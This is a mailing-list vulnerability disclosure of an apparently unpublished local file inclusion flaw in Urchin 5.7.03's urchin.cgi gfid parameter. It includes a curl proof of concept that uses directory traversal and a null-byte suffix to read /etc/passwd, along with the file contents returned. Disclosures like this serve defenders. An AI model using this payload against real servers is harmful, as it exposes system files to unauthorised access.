While fuzzing an Urchin web application, I discovered what appears to
be an LFI vulnerability.  Neither Secunia nor Google / Urchin appear
to have reported this as a known issue.  The problem lies in the gfid
parameter passed to urchin.cgi.  This was tested on a somewhat
modified version of Urchin 5.7.03, but it appears that the gfid param
can be influenced given the results.  I don't have the ability to test
further, but this appears valid and unpublished.  Can anyone confirm
they see similar behavior in the same version or other versions?

PoC:
"""
$ curl -s -b '...cookie_data...'
'https://host/path/urchin.cgi?profile=...&rid=13&cmd=svg&gfid=/../../../../../../../../../../../etc/passwd%00.html&ie5=.svg'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
...
"""
-- 
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianhermansen

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/